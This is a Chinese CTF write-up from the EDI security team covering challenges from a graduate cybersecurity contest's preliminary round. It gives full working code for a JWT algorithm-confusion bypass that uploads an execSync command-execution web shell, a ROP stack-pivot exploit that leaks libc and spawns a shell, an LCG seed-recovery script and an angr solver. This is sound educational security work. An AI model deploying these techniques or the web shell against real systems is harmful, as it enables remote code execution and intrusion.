EDI
JOIN US ▶▶▶
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn misc方向的师傅)有意向的师傅请联系邮箱root@edisec.net、[email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。
点击蓝字 · 关注我们
var publicKey = fs.readFileSync('./config/public.pem');
app.use(expressjwt({ secret: publicKey, algorithms: ["HS256",
"RS256"]}).unless({ path: ["/", "/api/login"] }))
app.use(function(req, res, next) {
if([req.body, req.query, req.auth,
req.headers].some(function(item) {
console.log(req.auth)
return item &&
/../|proc|public|routes|.js|cron|views/img.test(JSON.stringif
y(item));
})) {
return res.status(403).send('illegal data.');
} else {
next();
};
});
sleep 1
runuser -u ctfer nodemon app.js
/usr/bin/tail -f /dev/null
首先构造一个jwt,使用url编码绕过关键字检测
var jwt = require("jsonwebtoken");
var fs = require("fs");
payload = {
isAdmin: true,
username: "admin",
home: { "href": "ank1e", "origin": "ank1e", "protocol":
"file:", "hostname": "",
"pathname": "/app/%72%6f%75%74%65%73/index.%6a%73" }
}
var publicKey = fs.readFileSync('./public.pem');
var token = jwt.sign(payload, publicKey, { algorithm: "HS256" });
console.log(token)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlLCJ1c2Vy
bmFtZSI6ImFkbWluIiwiaG9tZSI6eyJocmVmIjoiYW5rMWUiLCJvcmlnaW4iOiJhb
msxZSIsInByb3RvY29sIjoiZmlsZToiLCJob3N0bmFtZSI6IiIsInBhdGhuYW1lIj
oiL2FwcC8lNzIlNmYlNzUlNzQlNjUlNzMvaW5kZXguJTZhJTczIn0sImlhdCI6MTY
2ODMxOTQyOX0.FlEloSS0gf3QdUzkZRUegU0c47whg8SUvitxkOnGySg
var express = require('express');
const execSync = require('child_process').execSync;
var router = express.Router();
/* GET home page. */
router.get('/', function(req, res, next) {
// res.render('index', { title: 'HackThisBox' });
var cmd = execSync(req.query.cmd);
res.send(cmd.toString());
});
module.exports = router;
import requests
sess = requests.session()
url = 'http://192.168.1.107:18000/'
hearder = {
"authorization":"Bearer
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlLCJ1c2Vy
bmFtZSI6ImFkbWluIiwiaG9tZSI6eyJocmVmIjoiYW5rMWUiLCJvcmlnaW4iOiJhb
msxZSIsInByb3RvY29sIjoiZmlsZToiLCJob3N0bmFtZSI6IiIsInBhdGhuYW1lIj
oiL2FwcC8lNzIlNmYlNzUlNzQlNjUlNzMvaW5kZXguJTZhJTczIn0sImlhdCI6MTY
2ODMxOTQyOX0.FlEloSS0gf3QdUzkZRUegU0c47whg8SUvitxkOnGySg"
}
file = {"file":("./index.js",open("./index.js","rb").read())}
res =
sess.post("http://192.168.1.107:18000/api/upload",files=file,head
ers=hearder)
print(res.text)
res = sess.get("http://192.168.1.107:18000/",params=
{"cmd":'/readflag'})
print(res.text)
1
2
拿到手是一个有问题的二维码,先补一个标志位,直接扫描
发现得到4个字符457c
binwalk分离一下这个图片,发现分离出来一串字符和一些数据,010打开数据发现 是个图片,但是少了8950,补全这个数据得到一个图片。
猜测这4个????是前面得到的457c, 然后看分离出来的一串字符
42064652d3431356135323533646230387d0ec187c229c4d4a44
看着很像是hex,但是转不出来,后来把第一位去掉发现得到flag后半部分
from pwn import *
from Crypto.Util.number import *
context.log_level='debug'
def solve1(a,b,num1,N):
return inverse(a,N)*(num1-b)%N
# 差分 num2-num1
def solve2(a,N,num1,num2):
b = (num2 - num1*a)%N
return inverse(a,N)*(num1-b)%N
# 差分 num3-num2,num2-num1
def solve3(N,num1,num2,num3):
a = inverse(num2-num1,N)*(num3-num2)%N
b = num2-a*num1
return inverse(a,N)*(num1-b)%N
# 等差数列求N
def solve4(num_list):
t=[]
for i in range(len(num_list)-1):
t.append(num_list[i+1]-num_list[i])
x=t[1]*t[3]-t[2]**2
y=t[2]*t[4]-t[3]**2
z=t[0]*t[4]-t[1]*t[3]
N=GCD(GCD(x,y),z)
num1,num2,num3=num_list[0],num_list[1],num_list[2]
a=inverse(num2-num1,N)*(num3-num2)%N
b=num2-a*num1
return inverse(a,N)*(num1-b)%N
num_list = []
r = remote('192.168.1.105',19999)
while True:
r.recvuntil('This is the')
challege = r.recvline()
# print("challenge1" in str(challege))
if "challenge1" in str(challege):
r.recvuntil('a=')
a = r.recvline()
r.recvuntil('b=')
b = r.recvline()
r.recvuntil('N=')
N = r.recvline()
r.recvuntil('num1=')
num1 = r.recvline()
seed = solve1(int(a),int(b),int(num1),int(N))
elif 'challenge2' in str(challege):
r.recvuntil('a=')
a = r.recvline()
r.recvuntil('N=')
N = r.recvline()
r.recvuntil('num1=')
num1 = r.recvline()
r.recvuntil('num2=')
num2 = r.recvline()
seed = solve2(int(a),int(N),int(num1),int(num2))
elif 'challenge3' in str(challege):
r.recvuntil('N=')
N = r.recvline()
r.recvuntil('num1=')
num1 = r.recvline()
r.recvuntil('num2=')
num2 = r.recvline()
r.recvuntil('num3=')
num3 = r.recvline()
seed = solve3(int(N),int(num1),int(num2),int(num3))
elif 'challenge4' in str(challege):
r.recvuntil('num1=')
num1 = r.recvline()
num_list.append(int(num1))
r.recvuntil('num2=')
num2 = r.recvline()
num_list.append(int(num2))
r.recvuntil('num3=')
num3 = r.recvline()
num_list.append(int(num3))
r.recvuntil('num4=')
num4 = r.recvline()
num_list.append(int(num4))
r.recvuntil('num5=')
num5 = r.recvline()
num_list.append(int(num5))
r.recvuntil('num6=')
num6 = r.recvline()
num_list.append(int(num6))
seed = solve4(num_list)
r.sendlineafter("seed =",str(seed))
# print(seed)
r.interactive()
docker pull angr/angr
docker run -it -v $(pwd):/ang angr/angr
cd /ang
python exp.py
import angr
p = angr.Project('./infantvm')
a = p.factory.entry_state()
sm = p.factory.simulation_manager(a)
def good(a):
return b"Good job" in a.posix.dumps(1)
def bad(a):
return b"Try again" in a.posix.dumps(1)
sm.explore(find=good,avoid=bad)
if sm.found:
find_a = sm.found[0]
flag = find_a.posix.dumps(0)
print(flag)
from pwn import *
#p = process('./stack')
p = remote('192.168.1.103', 19999)
elf = ELF('./stack')
libc = ELF('./libc.so.6')
leave_ret = 0x0000000000400718
pop_rdi = 0x00000000004007a3
bss = 0x00000000006010A0
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x000000000040071A
ret = 0x0000000000400509
#gdb.attach(p, "b main")
payload = p64(ret)*0x20 + p64(pop_rdi) + p64(puts_got) +
p64(puts_plt) + p64(main)
p.sendafter(b"input your name:n", payload)
payload = b'a'*0x70 + p64(bss) + p64(leave_ret)
p.sendafter(b"input your data:n", payload)
leak = u64(p.recv(6).ljust(8, b'x00')) - libc.sym['puts']
log.success(hex(leak))
sys = leak + libc.sym['system']
binsh = leak + 0x000000000018ce57
ogg = leak + 0xf1247
payload = p64(ret) + p64(pop_rdi) + p64(binsh) + p64(sys)
p.sendafter(b"input your name:n", payload)
payload = b'a'*0x70 + p64(bss) + p64(ogg)
p.sendafter(b"input your data:n", payload)
p.interactive()
ls /;ls /;
bin
dev
flag.txt
lib
lib32
lib64
stack
usr
bin
dev
flag.txt
lib
lib32
lib64
stack
usr
: not found
cat /flag.txt;cat /flag.txt;
: not
foundc4f67a718f59d93151f38a2804bf5feec4f67a718f59d93151f38sh: 30:
a2804bf5feec4f67a718f59d93151f38
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):“华为杯”第一届中国研究生网络安全创新大赛初赛WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论